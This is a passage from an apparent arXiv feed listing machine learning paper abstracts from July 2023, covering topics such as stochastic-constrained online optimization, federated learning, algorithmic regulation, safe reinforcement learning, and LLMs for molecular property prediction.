    This paper studies online convex optimization with stochastic constraints. We propose a variant of the drift-plus-penalty algorithm that guarantees $O(\sqrt{T})$ expected regret and zero constraint violation, after a fixed number of iterations, which improves the vanilla drift-plus-penalty method with $O(\sqrt{T})$ constraint violation. Our algorithm is oblivious to the length of the time horizon $T$, in contrast to the vanilla drift-plus-penalty method. This is based on our novel drift lemma that provides time-varying bounds on the virtual queue drift and, as a result, leads to time-varying bounds on the expected virtual queue length. Moreover, we extend our framework to stochastic-constrained online convex optimization under two-point bandit feedback. We show that by adapting our algorithmic framework to the bandit feedback setting, we may still achieve $O(\sqrt{T})$ expected regret and zero constraint violation, improving upon the previous work for the case of identical constraint functions. Numerical results demonstrate our theoretical results.
    Ed-Fed: A generic federated learning framework with resource-aware client selection for edge devices. (arXiv:2307.07199v1 [cs.DC])
    Federated learning (FL) has evolved as a prominent method for edge devices to cooperatively create a unified prediction model while securing their sensitive training data local to the device. Despite the existence of numerous research frameworks for simulating FL algorithms, they do not facilitate comprehensive deployment for automatic speech recognition tasks on heterogeneous edge devices. This is where Ed-Fed, a comprehensive and generic FL framework, comes in as a foundation for future practical FL system research. We also propose a novel resource-aware client selection algorithm to optimise the waiting time in the FL settings. We show that our approach can handle the straggler devices and dynamically set the training time for the selected devices in a round. Our evaluation has shown that the proposed approach significantly optimises waiting time in FL compared to conventional random client selection methods.  ( 2 min )
    Unpacking the Black Box: Regulating Algorithmic Decisions. (arXiv:2110.03443v2 [econ.GN] UPDATED)
    We show how to optimally regulate prediction algorithms in a world where an agent uses complex 'black-box' prediction functions to make decisions such as lending, medical testing, or hiring, and where a principal is limited in how much she can learn about the agent's black-box model. We show that limiting agents to prediction functions that are simple enough to be fully transparent is inefficient as long as the misalignment is limited and first-best prediction functions are sufficiently complex. Algorithmic audits can improve welfare, but the gains depend on the design of the audit tools. Tools that focus on minimizing overall information loss, the focus of many explainer tools, will generally be inefficient since they focus on explaining the average behavior of the prediction function. Targeted tools that focus on the source of incentive misalignment, e.g., excess false positives or racial disparities, can provide second-best solutions. We provide empirical support for our theoretical findings using an application in consumer lending, where we document that complex models regulated based on context-specific explanation tools outperform simple, fully transparent models. This gain from complex models represents a Pareto improvement across our empirical applications that are preferred both by the lender and from the perspective of the financial regulator.
    Deep Explainable Relational Reinforcement Learning: A Neuro-Symbolic Approach. (arXiv:2304.08349v2 [cs.AI] UPDATED)
    Despite numerous successes in Deep Reinforcement Learning (DRL), the learned policies are not interpretable. Moreover, since DRL does not exploit symbolic relational representations, it has difficulties in coping with structural changes in its environment (such as increasing the number of objects). Relational Reinforcement Learning, on the other hand, inherits the relational representations from symbolic planning to learn reusable policies. However, it has so far been unable to scale up and exploit the power of deep neural networks. We propose Deep Explainable Relational Reinforcement Learning (DERRL), a framework that exploits the best of both -- neural and symbolic worlds. By resorting to a neuro-symbolic approach, DERRL combines relational representations and constraints from symbolic planning with deep learning to extract interpretable policies. These policies are in the form of logical rules that explain how each decision (or action) is arrived at. Through several experiments, in setups like the Countdown Game, Blocks World, Gridworld, and Traffic, we show that the policies learned by DERRL can be applied to different configurations and contexts, hence generalizing to environmental modifications.
    Few-Shot Continual Learning via Flat-to-Wide Approaches. (arXiv:2306.14369v2 [cs.LG] UPDATED)
    Existing approaches on continual learning call for a lot of samples in their training processes. Such approaches are impractical for many real-world problems having limited samples because of the overfitting problem. This paper proposes a few-shot continual learning approach, termed FLat-tO-WidE AppRoach (FLOWER), where a flat-to-wide learning process finding the flat-wide minima is proposed to address the catastrophic forgetting problem. The issue of data scarcity is overcome with a data augmentation approach making use of a ball generator concept to restrict the sampling space into the smallest enclosing ball. Our numerical studies demonstrate the advantage of FLOWER achieving significantly improved performances over prior arts notably in the small base tasks. For further study, source codes of FLOWER, competitor algorithms and experimental logs are shared publicly in \url{https://github.com/anwarmaxsum/FLOWER}.
    Fully probabilistic deep models for forward and inverse problems in parametric PDEs. (arXiv:2208.04856v2 [stat.ML] UPDATED)
    We introduce a physics-driven deep latent variable model (PDDLVM) to learn simultaneously parameter-to-solution (forward) and solution-to-parameter (inverse) maps of parametric partial differential equations (PDEs). Our formulation leverages conventional PDE discretization techniques, deep neural networks, probabilistic modelling, and variational inference to assemble a fully probabilistic coherent framework. In the posited probabilistic model, both the forward and inverse maps are approximated as Gaussian distributions with a mean and covariance parameterized by deep neural networks. The PDE residual is assumed to be an observed random vector of value zero, hence we model it as a random vector with a zero mean and a user-prescribed covariance. The model is trained by maximizing the probability, that is the evidence or marginal likelihood, of observing a residual of zero by maximizing the evidence lower bound (ELBO). Consequently, the proposed methodology does not require any independent PDE solves and is physics-informed at training time, allowing the real-time solution of PDE forward and inverse problems after training. The proposed framework can be easily extended to seamlessly integrate observed data to solve inverse problems and to build generative models. We demonstrate the efficiency and robustness of our method on finite element discretized parametric PDE problems such as linear and nonlinear Poisson problems, elastic shells with complex 3D geometries, and time-dependent nonlinear and inhomogeneous PDEs using a physics-informed neural network (PINN) discretization. We achieve up to three orders of magnitude speed-up after training compared to traditional finite element method (FEM), while outputting coherent uncertainty estimates.
    Proof of Training (PoT): Harnessing Crypto Mining Power for Distributed AI Training. (arXiv:2307.07066v1 [cs.CR])
    In the midst of the emerging trend of integrating artificial intelligence (AI) with crypto mining, we identify three major challenges that create a gap between these two fields. To bridge this gap, we introduce the proof-of-training (PoT) protocol, an approach that combines the strengths of both AI and blockchain technology. The PoT protocol utilizes the practical Byzantine fault tolerance (PBFT) consensus mechanism to synchronize global states. To evaluate the performance of the protocol design, we present an implementation of a decentralized training network (DTN) that adopts the PoT protocol. Our results indicate that the protocol exhibits considerable potential in terms of task throughput, system robustness, and network security.
    HEAL-SWIN: A Vision Transformer On The Sphere. (arXiv:2307.07313v1 [cs.CV])
    High-resolution wide-angle fisheye images are becoming more and more important for robotics applications such as autonomous driving. However, using ordinary convolutional neural networks or vision transformers on this data is problematic due to projection and distortion losses introduced when projecting to a rectangular grid on the plane. We introduce the HEAL-SWIN transformer, which combines the highly uniform Hierarchical Equal Area iso-Latitude Pixelation (HEALPix) grid used in astrophysics and cosmology with the Hierarchical Shifted-Window (SWIN) transformer to yield an efficient and flexible model capable of training on high-resolution, distortion-free spherical data. In HEAL-SWIN, the nested structure of the HEALPix grid is used to perform the patching and windowing operations of the SWIN transformer, resulting in a one-dimensional representation of the spherical data with minimal computational overhead. We demonstrate the superior performance of our model for semantic segmentation and depth regression tasks on both synthetic and real automotive datasets. Our code is available at https://github.com/JanEGerken/HEAL-SWIN.  ( 2 min )
    Real-time Percussive Technique Recognition and Embedding Learning for the Acoustic Guitar. (arXiv:2307.07426v1 [cs.SD])
    Real-time music information retrieval (RT-MIR) has much potential to augment the capabilities of traditional acoustic instruments. We develop RT-MIR techniques aimed at augmenting percussive fingerstyle, which blends acoustic guitar playing with guitar body percussion. We formulate several design objectives for RT-MIR systems for augmented instrument performance: (i) causal constraint, (ii) perceptually negligible action-to-sound latency, (iii) control intimacy support, (iv) synthesis control support. We present and evaluate real-time guitar body percussion recognition and embedding learning techniques based on convolutional neural networks (CNNs) and CNNs jointly trained with variational autoencoders (VAEs). We introduce a taxonomy of guitar body percussion based on hand part and location. We follow a cross-dataset evaluation approach by collecting three datasets labelled according to the taxonomy. The embedding quality of the models is assessed using KL-Divergence across distributions corresponding to different taxonomic classes. Results indicate that the networks are strong classifiers especially in a simplified 2-class recognition task, and the VAEs yield improved class separation compared to CNNs as evidenced by increased KL-Divergence across distributions. We argue that the VAE embedding quality could support control intimacy and rich interaction when the latent space's parameters are used to control an external synthesis engine. Further design challenges around generalisation to different datasets have been identified.  ( 2 min )
    Hypothesis Transfer Learning with Surrogate Classification Losses: Generalization Bounds through Algorithmic Stability. (arXiv:2305.19694v2 [stat.ML] UPDATED)
    Hypothesis transfer learning (HTL) contrasts domain adaptation by allowing for a previous task leverage, named the source, into a new one, the target, without requiring access to the source data. Indeed, HTL relies only on a hypothesis learnt from such source data, relieving the hurdle of expansive data storage and providing great practical benefits. Hence, HTL is highly beneficial for real-world applications relying on big data. The analysis of such a method from a theoretical perspective faces multiple challenges, particularly in classification tasks. This paper deals with this problem by studying the learning theory of HTL through algorithmic stability, an attractive theoretical framework for machine learning algorithms analysis. In particular, we are interested in the statistical behaviour of the regularized empirical risk minimizers in the case of binary classification. Our stability analysis provides learning guarantees under mild assumptions. Consequently, we derive several complexity-free generalization bounds for essential statistical quantities like the training error, the excess risk and cross-validation estimates. These refined bounds allow understanding the benefits of transfer learning and comparing the behaviour of standard losses in different scenarios, leading to valuable insights for practitioners.
    Privacy-preserving machine learning with tensor networks. (arXiv:2202.12319v2 [cs.CR] UPDATED)
    Tensor networks, widely used for providing efficient representations of low-energy states of local quantum many-body systems, have been recently proposed as machine learning architectures which could present advantages with respect to traditional ones. In this work we show that tensor network architectures have especially prospective properties for privacy-preserving machine learning, which is important in tasks such as the processing of medical records. First, we describe a new privacy vulnerability that is present in feedforward neural networks, illustrating it in synthetic and real-world datasets. Then, we develop well-defined conditions to guarantee robustness to such vulnerability, which involve the characterization of models equivalent under gauge symmetry. We rigorously prove that such conditions are satisfied by tensor-network architectures. In doing so, we define a novel canonical form for matrix product states, which has a high degree of regularity and fixes the residual gauge that is left in the canonical forms based on singular value decompositions. We supplement the analytical findings with practical examples where matrix product states are trained on datasets of medical records, which show large reductions on the probability of an attacker extracting information about the training dataset from the model's parameters. Given the growing expertise in training tensor-network architectures, these results imply that one may not have to be forced to make a choice between accuracy in prediction and ensuring the privacy of the information processed.
    Differentially Private Clustering in Data Streams. (arXiv:2307.07449v1 [cs.DS])
    The streaming model is an abstraction of computing over massive data streams, which is a popular way of dealing with large-scale modern data analysis. In this model, there is a stream of data points, one after the other. A streaming algorithm is only allowed one pass over the data stream, and the goal is to perform some analysis during the stream while using as small space as possible. Clustering problems (such as $k$-means and $k$-median) are fundamental unsupervised machine learning primitives, and streaming clustering algorithms have been extensively studied in the past. However, since data privacy becomes a central concern in many real-world applications, non-private clustering algorithms are not applicable in many scenarios. In this work, we provide the first differentially private streaming algorithms for $k$-means and $k$-median clustering of $d$-dimensional Euclidean data points over a stream with length at most $T$ using $poly(k,d,\log(T))$ space to achieve a {\it constant} multiplicative error and a $poly(k,d,\log(T))$ additive error. In particular, we present a differentially private streaming clustering framework which only requires an offline DP coreset algorithm as a blackbox. By plugging in existing DP coreset results via Ghazi, Kumar, Manurangsi 2020 and Kaplan, Stemmer 2018, we achieve (1) a $(1+\gamma)$-multiplicative approximation with $\tilde{O}_\gamma(poly(k,d,\log(T)))$ space for any $\gamma>0$, and the additive error is $poly(k,d,\log(T))$ or (2) an $O(1)$-multiplicative approximation with $\tilde{O}(k \cdot poly(d,\log(T)))$ space and $poly(k,d,\log(T))$ additive error. In addition, our algorithmic framework is also differentially private under the continual release setting, i.e., the union of outputs of our algorithms at every timestamp is always differentially private.  ( 3 min )
    PseudoCal: A Source-Free Approach to Unsupervised Uncertainty Calibration in Domain Adaptation. (arXiv:2307.07489v1 [cs.LG])
    Unsupervised domain adaptation (UDA) has witnessed remarkable advancements in improving the accuracy of models for unlabeled target domains. However, the calibration of predictive uncertainty in the target domain, a crucial aspect of the safe deployment of UDA models, has received limited attention. The conventional in-domain calibration method, \textit{temperature scaling} (TempScal), encounters challenges due to domain distribution shifts and the absence of labeled target domain data. Recent approaches have employed importance-weighting techniques to estimate the target-optimal temperature based on re-weighted labeled source data. Nonetheless, these methods require source data and suffer from unreliable density estimates under severe domain shifts, rendering them unsuitable for source-free UDA settings. To overcome these limitations, we propose PseudoCal, a source-free calibration method that exclusively relies on unlabeled target data. Unlike previous approaches that treat UDA calibration as a \textit{covariate shift} problem, we consider it as an unsupervised calibration problem specific to the target domain. Motivated by the factorization of the negative log-likelihood (NLL) objective in TempScal, we generate a labeled pseudo-target set that captures the structure of the real target. By doing so, we transform the unsupervised calibration problem into a supervised one, enabling us to effectively address it using widely-used in-domain methods like TempScal. Finally, we thoroughly evaluate the calibration performance of PseudoCal by conducting extensive experiments on 10 UDA methods, considering both traditional UDA settings and recent source-free UDA scenarios. The experimental results consistently demonstrate the superior performance of PseudoCal, exhibiting significantly reduced calibration error compared to existing calibration methods.
    Deep reinforcement learning for the dynamic vehicle dispatching problem: An event-based approach. (arXiv:2307.07508v1 [cs.AI])
    The dynamic vehicle dispatching problem corresponds to deciding which vehicles to assign to requests that arise stochastically over time and space. It emerges in diverse areas, such as in the assignment of trucks to loads to be transported; in emergency systems; and in ride-hailing services. In this paper, we model the problem as a semi-Markov decision process, which allows us to treat time as continuous. In this setting, decision epochs coincide with discrete events whose time intervals are random. We argue that an event-based approach substantially reduces the combinatorial complexity of the decision space and overcomes other limitations of discrete-time models often proposed in the literature. In order to test our approach, we develop a new discrete-event simulator and use double deep q-learning to train our decision agents. Numerical experiments are carried out in realistic scenarios using data from New York City. We compare the policies obtained through our approach with heuristic policies often used in practice. Results show that our policies exhibit better average waiting times, cancellation rates and total service times, with reduction in average waiting times of up to 50% relative to the other tested heuristic policies.  ( 2 min )
    Vulnerability-Aware Instance Reweighting For Adversarial Training. (arXiv:2307.07167v1 [cs.LG])
    Adversarial Training (AT) has been found to substantially improve the robustness of deep learning classifiers against adversarial attacks. AT involves obtaining robustness by including adversarial examples in training a classifier. Most variants of AT algorithms treat every training example equally. However, recent works have shown that better performance is achievable by treating them unequally. In addition, it has been observed that AT exerts an uneven influence on different classes in a training set and unfairly hurts examples corresponding to classes that are inherently harder to classify. Consequently, various reweighting schemes have been proposed that assign unequal weights to robust losses of individual examples in a training set. In this work, we propose a novel instance-wise reweighting scheme. It considers the vulnerability of each natural example and the resulting information loss on its adversarial counterpart occasioned by adversarial attacks. Through extensive experiments, we show that our proposed method significantly improves over existing reweighting schemes, especially against strong white and black-box attacks.  ( 2 min )
    Kernel t-distributed stochastic neighbor embedding. (arXiv:2307.07081v1 [cs.LG])
    This paper presents a kernelized version of the t-SNE algorithm, capable of mapping high-dimensional data to a low-dimensional space while preserving the pairwise distances between the data points in a non-Euclidean metric. This can be achieved using a kernel trick only in the high dimensional space or in both spaces, leading to an end-to-end kernelized version. The proposed kernelized version of the t-SNE algorithm can offer new views on the relationships between data points, which can improve performance and accuracy in particular applications, such as classification problems involving kernel methods. The differences between t-SNE and its kernelized version are illustrated for several datasets, showing a neater clustering of points belonging to different classes.  ( 2 min )
    $\Phi$-DVAE: Physics-Informed Dynamical Variational Autoencoders for Unstructured Data Assimilation. (arXiv:2209.15609v2 [stat.ML] UPDATED)
    Incorporating unstructured data into physical models is a challenging problem that is emerging in data assimilation. Traditional approaches focus on well-defined observation operators whose functional forms are typically assumed to be known. This prevents these methods from achieving a consistent model-data synthesis in configurations where the mapping from data-space to model-space is unknown. To address these shortcomings, in this paper we develop a physics-informed dynamical variational autoencoder ($\Phi$-DVAE) to embed diverse data streams into time-evolving physical systems described by differential equations. Our approach combines a standard, possibly nonlinear, filter for the latent state-space model and a VAE, to assimilate the unstructured data into the latent dynamical system. Unstructured data, in our example systems, comes in the form of video data and velocity field measurements, however the methodology is suitably generic to allow for arbitrary unknown observation operators. A variational Bayesian framework is used for the joint estimation of the encoding, latent states, and unknown system parameters. To demonstrate the method, we provide case studies with the Lorenz-63 ordinary differential equation, and the advection and Korteweg-de Vries partial differential equations. Our results, with synthetic data, show that $\Phi$-DVAE provides a data efficient dynamics encoding methodology which is competitive with standard approaches. Unknown parameters are recovered with uncertainty quantification, and unseen data are accurately predicted.
    A Context-Aware Cutting Plane Selection Algorithm for Mixed-Integer Programming. (arXiv:2307.07322v1 [math.OC])
    The current cut selection algorithm used in mixed-integer programming solvers has remained largely unchanged since its creation. In this paper, we propose a set of new cut scoring measures, cut filtering techniques, and stopping criteria, extending the current state-of-the-art algorithm and obtaining a 4\% performance improvement for SCIP over the MIPLIB 2017 benchmark set.  ( 2 min )
    Benchmarks and Custom Package for Electrical Load Forecasting. (arXiv:2307.07191v1 [cs.LG])
    Load forecasting is of great significance in the power industry as it can provide a reference for subsequent tasks such as power grid dispatch, thus bringing huge economic benefits. However, there are many differences between load forecasting and traditional time series forecasting. On the one hand, load forecasting aims to minimize the cost of subsequent tasks such as power grid dispatch, rather than simply pursuing prediction accuracy. On the other hand, the load is largely influenced by many external factors, such as temperature or calendar variables. In addition, the scale of predictions (such as building-level loads and aggregated-level loads) can also significantly impact the predicted results. In this paper, we provide a comprehensive load forecasting archive, which includes load domain-specific feature engineering to help forecasting models better model load data. In addition, different from the traditional loss function which only aims for accuracy, we also provide a method to customize the loss function based on the forecasting error, integrating it into our forecasting framework. Based on this, we conducted extensive experiments on load data at different levels, providing a reference for researchers to compare different load forecasting models.  ( 2 min )
    Hybrid moderation in the newsroom: Recommending featured posts to content moderators. (arXiv:2307.07317v1 [cs.IR])
    Online news outlets are grappling with the moderation of user-generated content within their comment section. We present a recommender system based on ranking class probabilities to support and empower the moderator in choosing featured posts, a time-consuming task. By combining user and textual content features we obtain an optimal classification F1-score of 0.44 on the test set. Furthermore, we observe an optimum mean NDCG@5 of 0.87 on a large set of validation articles. As an expert evaluation, content moderators assessed the output of a random selection of articles by choosing comments to feature based on the recommendations, which resulted in a NDCG score of 0.83. We conclude that first, adding text features yields the best score and second, while choosing featured content remains somewhat subjective, content moderators found suitable comments in all but one evaluated recommendations. We end the paper by analyzing our best-performing model, a step towards transparency and explainability in hybrid content moderation.  ( 2 min )
    DataAssist: A Machine Learning Approach to Data Cleaning and Preparation. (arXiv:2307.07119v1 [cs.LG])
    Current automated machine learning (ML) tools are model-centric, focusing on model selection and parameter optimization. However, the majority of the time in data analysis is devoted to data cleaning and wrangling, for which limited tools are available. Here we present DataAssist, an automated data preparation and cleaning platform that enhances dataset quality using ML-informed methods. We show that DataAssist provides a pipeline for exploratory data analysis and data cleaning, including generating visualization for user-selected variables, unifying data annotation, suggesting anomaly removal, and preprocessing data. The exported dataset can be readily integrated with other autoML tools or user-specified model for downstream analysis. Our data-centric tool is applicable to a variety of fields, including economics, business, and forecasting applications saving over 50\% time of the time spent on data cleansing and preparation.  ( 2 min )
    Controlling dynamical systems to complex target states using machine learning: next-generation vs. classical reservoir computing. (arXiv:2307.07195v1 [cs.LG])
    Controlling nonlinear dynamical systems using machine learning allows to not only drive systems into simple behavior like periodicity but also to more complex arbitrary dynamics. For this, it is crucial that a machine learning system can be trained to reproduce the target dynamics sufficiently well. On the example of forcing a chaotic parametrization of the Lorenz system into intermittent dynamics, we show first that classical reservoir computing excels at this task. In a next step, we compare those results based on different amounts of training data to an alternative setup, where next-generation reservoir computing is used instead. It turns out that while delivering comparable performance for usual amounts of training data, next-generation RC significantly outperforms in situations where only very limited data is available. This opens even further practical control applications in real world problems where data is restricted.  ( 2 min )
    A testing-based approach to assess the clusterability of categorical data. (arXiv:2307.07346v1 [cs.LG])
    The objective of clusterability evaluation is to check whether a clustering structure exists within the data set. As a crucial yet often-overlooked issue in cluster analysis, it is essential to conduct such a test before applying any clustering algorithm. If a data set is unclusterable, any subsequent clustering analysis would not yield valid results. Despite its importance, the majority of existing studies focus on numerical data, leaving the clusterability evaluation issue for categorical data as an open problem. Here we present TestCat, a testing-based approach to assess the clusterability of categorical data in terms of an analytical $p$-value. The key idea underlying TestCat is that clusterable categorical data possess many strongly correlated attribute pairs and hence the sum of chi-squared statistics of all attribute pairs is employed as the test statistic for $p$-value calculation. We apply our method to a set of benchmark categorical data sets, showing that TestCat outperforms those solutions based on existing clusterability evaluation methods for numeric data. To the best of our knowledge, our work provides the first way to effectively recognize the clusterability of categorical data in a statistically sound manner.  ( 2 min )
    Generative adversarial networks for data-scarce spectral applications. (arXiv:2307.07454v1 [physics.optics])
    Generative adversarial networks (GANs) are one of the most robust and versatile techniques in the field of generative artificial intelligence. In this work, we report on an application of GANs in the domain of synthetic spectral data generation, offering a solution to the scarcity of data found in various scientific contexts. We demonstrate the proposed approach by applying it to an illustrative problem within the realm of near-field radiative heat transfer involving a multilayered hyperbolic metamaterial. We find that a successful generation of spectral data requires two modifications to conventional GANs: (i) the introduction of Wasserstein GANs (WGANs) to avoid mode collapse, and, (ii) the conditioning of WGANs to obtain accurate labels for the generated data. We show that a simple feed-forward neural network (FFNN), when augmented with data generated by a CWGAN, enhances significantly its performance under conditions of limited data availability, demonstrating the intrinsic value of CWGAN data augmentation beyond simply providing larger datasets. In addition, we show that CWGANs can act as a surrogate model with improved performance in the low-data regime with respect to simple FFNNs. Overall, this work highlights the potential of generative machine learning algorithms in scientific applications beyond image generation and optimization.  ( 2 min )
    Wasserstein Quantum Monte Carlo: A Novel Approach for Solving the Quantum Many-Body Schr\"odinger Equation. (arXiv:2307.07050v1 [physics.comp-ph])
    Solving the quantum many-body Schr\"odinger equation is a fundamental and challenging problem in the fields of quantum physics, quantum chemistry, and material sciences. One of the common computational approaches to this problem is Quantum Variational Monte Carlo (QVMC), in which ground-state solutions are obtained by minimizing the energy of the system within a restricted family of parameterized wave functions. Deep learning methods partially address the limitations of traditional QVMC by representing a rich family of wave functions in terms of neural networks. However, the optimization objective in QVMC remains notoriously hard to minimize and requires second-order optimization methods such as natural gradient. In this paper, we first reformulate energy functional minimization in the space of Born distributions corresponding to particle-permutation (anti-)symmetric wave functions, rather than the space of wave functions. We then interpret QVMC as the Fisher--Rao gradient flow in this distributional space, followed by a projection step onto the variational manifold. This perspective provides us with a principled framework to derive new QMC algorithms, by endowing the distributional space with better metrics, and following the projected gradient flow induced by those metrics. More specifically, we propose "Wasserstein Quantum Monte Carlo" (WQMC), which uses the gradient flow induced by the Wasserstein metric, rather than Fisher--Rao metric, and corresponds to transporting the probability mass, rather than teleporting it. We demonstrate empirically that the dynamics of WQMC results in faster convergence to the ground state of molecular systems.  ( 3 min )
    Enhancing ECG Analysis of Implantable Cardiac Monitor Data: An Efficient Pipeline for Multi-Label Classification. (arXiv:2307.07423v1 [eess.SP])
    Implantable Cardiac Monitor (ICM) devices are demonstrating as of today, the fastest-growing market for implantable cardiac devices. As such, they are becoming increasingly common in patients for measuring heart electrical activity. ICMs constantly monitor and record a patient's heart rhythm and when triggered - send it to a secure server where health care professionals (denote HCPs from here on) can review it. These devices employ a relatively simplistic rule-based algorithm (due to energy consumption constraints) to alert for abnormal heart rhythms. This algorithm is usually parameterized to an over-sensitive mode in order to not miss a case (resulting in relatively high false-positive rate) and this, combined with the device's nature of constantly monitoring the heart rhythm and its growing popularity, results in HCPs having to analyze and diagnose an increasingly growing amount of data. In order to reduce the load on the latter, automated methods for ECG analysis are nowadays becoming a great tool to assist HCPs in their analysis. While state-of-the-art algorithms are data-driven rather than rule-based, training data for ICMs often consist of specific characteristics which make its analysis unique and particularly challenging. This study presents the challenges and solutions in automatically analyzing ICM data and introduces a method for its classification that outperforms existing methods on such data. As such, it could be used in numerous ways such as aiding HCPs in the analysis of ECGs originating from ICMs by e.g. suggesting a rhythm type.  ( 3 min )
    Representation Learning With Hidden Unit Clustering For Low Resource Speech Applications. (arXiv:2307.07325v1 [eess.AS])
    The representation learning of speech, without textual resources, is an area of significant interest for many low resource speech applications. In this paper, we describe an approach to self-supervised representation learning from raw audio using a hidden unit clustering (HUC) framework. The input to the model consists of audio samples that are windowed and processed with 1-D convolutional layers. The learned "time-frequency" representations from the convolutional neural network (CNN) module are further processed with long short term memory (LSTM) layers which generate a contextual vector representation for every windowed segment. The HUC framework, allowing the categorization of the representations into a small number of phoneme-like units, is used to train the model for learning semantically rich speech representations. The targets consist of phoneme-like pseudo labels for each audio segment and these are generated with an iterative k-means algorithm. We explore techniques that improve the speaker invariance of the learned representations and illustrate the effectiveness of the proposed approach on two settings, i) completely unsupervised speech applications on the sub-tasks described as part of the ZeroSpeech 2021 challenge and ii) semi-supervised automatic speech recognition (ASR) applications on the TIMIT dataset and on the GramVaani challenge Hindi dataset. In these experiments, we achieve state-of-art results for various ZeroSpeech tasks. Further, on the ASR experiments, the HUC representations are shown to improve significantly over other established benchmarks based on Wav2vec, HuBERT and Best-RQ.  ( 3 min )
    Multi-Dimensional Ability Diagnosis for Machine Learning Algorithms. (arXiv:2307.07134v1 [cs.LG])
    Machine learning algorithms have become ubiquitous in a number of applications (e.g. image classification). However, due to the insufficient measurement of traditional metrics (e.g. the coarse-grained Accuracy of each classifier), substantial gaps are usually observed between the real-world performance of these algorithms and their scores in standardized evaluations. In this paper, inspired by the psychometric theories from human measurement, we propose a task-agnostic evaluation framework Camilla, where a multi-dimensional diagnostic metric Ability is defined for collaboratively measuring the multifaceted strength of each machine learning algorithm. Specifically, given the response logs from different algorithms to data samples, we leverage cognitive diagnosis assumptions and neural networks to learn the complex interactions among algorithms, samples and the skills (explicitly or implicitly pre-defined) of each sample. In this way, both the abilities of each algorithm on multiple skills and some of the sample factors (e.g. sample difficulty) can be simultaneously quantified. We conduct extensive experiments with hundreds of machine learning algorithms on four public datasets, and our experimental results demonstrate that Camilla not only can capture the pros and cons of each algorithm more precisely, but also outperforms state-of-the-art baselines on the metric reliability, rank consistency and rank stability.  ( 2 min )
    Making the Most Out of the Limited Context Length: Predictive Power Varies with Clinical Note Type and Note Section. (arXiv:2307.07051v1 [cs.CL])
    Recent advances in large language models have led to renewed interest in natural language processing in healthcare using the free text of clinical notes. One distinguishing characteristic of clinical notes is their long time span over multiple long documents. The unique structure of clinical notes creates a new design choice: when the context length for a language model predictor is limited, which part of clinical notes should we choose as the input? Existing studies either choose the inputs with domain knowledge or simply truncate them. We propose a framework to analyze the sections with high predictive power. Using MIMIC-III, we show that: 1) predictive power distribution is different between nursing notes and discharge notes and 2) combining different types of notes could improve performance when the context length is large. Our findings suggest that a carefully selected sampling function could enable more efficient information extraction from clinical notes.  ( 2 min )
    FedBIAD: Communication-Efficient and Accuracy-Guaranteed Federated Learning with Bayesian Inference-Based Adaptive Dropout. (arXiv:2307.07172v1 [cs.DC])
    Federated Learning (FL) emerges as a distributed machine learning paradigm without end-user data transmission, effectively avoiding privacy leakage. Participating devices in FL are usually bandwidth-constrained, and the uplink is much slower than the downlink in wireless networks, which causes a severe uplink communication bottleneck. A prominent direction to alleviate this problem is federated dropout, which drops fractional weights of local models. However, existing federated dropout studies focus on random or ordered dropout and lack theoretical support, resulting in unguaranteed performance. In this paper, we propose Federated learning with Bayesian Inference-based Adaptive Dropout (FedBIAD), which regards weight rows of local models as probability distributions and adaptively drops partial weight rows based on importance indicators correlated with the trend of local training loss. By applying FedBIAD, each client adaptively selects a high-quality dropping pattern with accurate approximations and only transmits parameters of non-dropped weight rows to mitigate uplink costs while improving accuracy. Theoretical analysis demonstrates that the convergence rate of the average generalization error of FedBIAD is minimax optimal up to a squared logarithmic factor. Extensive experiments on image classification and next-word prediction show that compared with status quo approaches, FedBIAD provides 2x uplink reduction with an accuracy increase of up to 2.41% even on non-Independent and Identically Distributed (non-IID) data, which brings up to 72% decrease in training time.  ( 3 min )
    Do not Mask Randomly: Effective Domain-adaptive Pre-training by Masking In-domain Keywords. (arXiv:2307.07160v1 [cs.CL])
    We propose a novel task-agnostic in-domain pre-training method that sits between generic pre-training and fine-tuning. Our approach selectively masks in-domain keywords, i.e., words that provide a compact representation of the target domain. We identify such keywords using KeyBERT (Grootendorst, 2020). We evaluate our approach using six different settings: three datasets combined with two distinct pre-trained language models (PLMs). Our results reveal that the fine-tuned PLMs adapted using our in-domain pre-training strategy outperform PLMs that used in-domain pre-training with random masking as well as those that followed the common pre-train-then-fine-tune paradigm. Further, the overhead of identifying in-domain keywords is reasonable, e.g., 7-15% of the pre-training time (for two epochs) for BERT Large (Devlin et al., 2019).  ( 2 min )
    Safe DreamerV3: Safe Reinforcement Learning with World Models. (arXiv:2307.07176v1 [cs.LG])
    The widespread application of Reinforcement Learning (RL) in real-world situations is yet to come to fruition, largely as a result of its failure to satisfy the essential safety demands of such systems. Existing safe reinforcement learning (SafeRL) methods, employing cost functions to enhance safety, fail to achieve zero-cost in complex scenarios, including vision-only tasks, even with comprehensive data sampling and training. To address this, we introduce Safe DreamerV3, a novel algorithm that integrates both Lagrangian-based and planning-based methods within a world model. Our methodology represents a significant advancement in SafeRL as the first algorithm to achieve nearly zero-cost in both low-dimensional and vision-only tasks within the Safety-Gymnasium benchmark. Our project website can be found in: https://sites.google.com/view/safedreamerv3.
    Can Large Language Models Empower Molecular Property Prediction?. (arXiv:2307.07443v1 [cs.LG])
    Molecular property prediction has gained significant attention due to its transformative potential in multiple scientific disciplines. Conventionally, a molecule graph can be represented either as a graph-structured data or a SMILES text. Recently, the rapid development of Large Language Models (LLMs) has revolutionized the field of NLP. Although it is natural to utilize LLMs to assist in understanding molecules represented by SMILES, the exploration of how LLMs will impact molecular property prediction is still in its early stage. In this work, we advance towards this objective through two perspectives: zero/few-shot molecular classification, and using the new explanations generated by LLMs as representations of molecules. To be specific, we first prompt LLMs to do in-context molecular classification and evaluate their performance. After that, we employ LLMs to generate semantically enriched explanations for the original SMILES and then leverage that to fine-tune a small-scale LM model for multiple downstream tasks. The experimental results highlight the superiority of text explanations as molecular representations across multiple benchmark datasets, and confirm the immense potential of LLMs in molecular property prediction tasks. Codes are available at \url{https://github.com/ChnQ/LLM4Mol}.
    A decision framework for selecting information-transfer strategies in population-based SHM. (arXiv:2307.06978v1 [cs.LG])
    Decision-support for the operation and maintenance of structures provides significant motivation for the development and implementation of structural health monitoring (SHM) systems. Unfortunately, the limited availability of labelled training data hinders the development of the statistical models on which these decision-support systems rely. Population-based SHM seeks to mitigate the impact of data scarcity by using transfer learning techniques to share information between individual structures within a population. The current paper proposes a decision framework for selecting transfer strategies based upon a novel concept -- the expected value of information transfer -- such that negative transfer is avoided. By avoiding negative transfer, and by optimising information transfer strategies using the transfer-decision framework, one can reduce the costs associated with operating and maintaining structures, and improve safety.
    Variance-reduced accelerated methods for decentralized stochastic double-regularized nonconvex strongly-concave minimax problems. (arXiv:2307.07113v1 [math.OC])
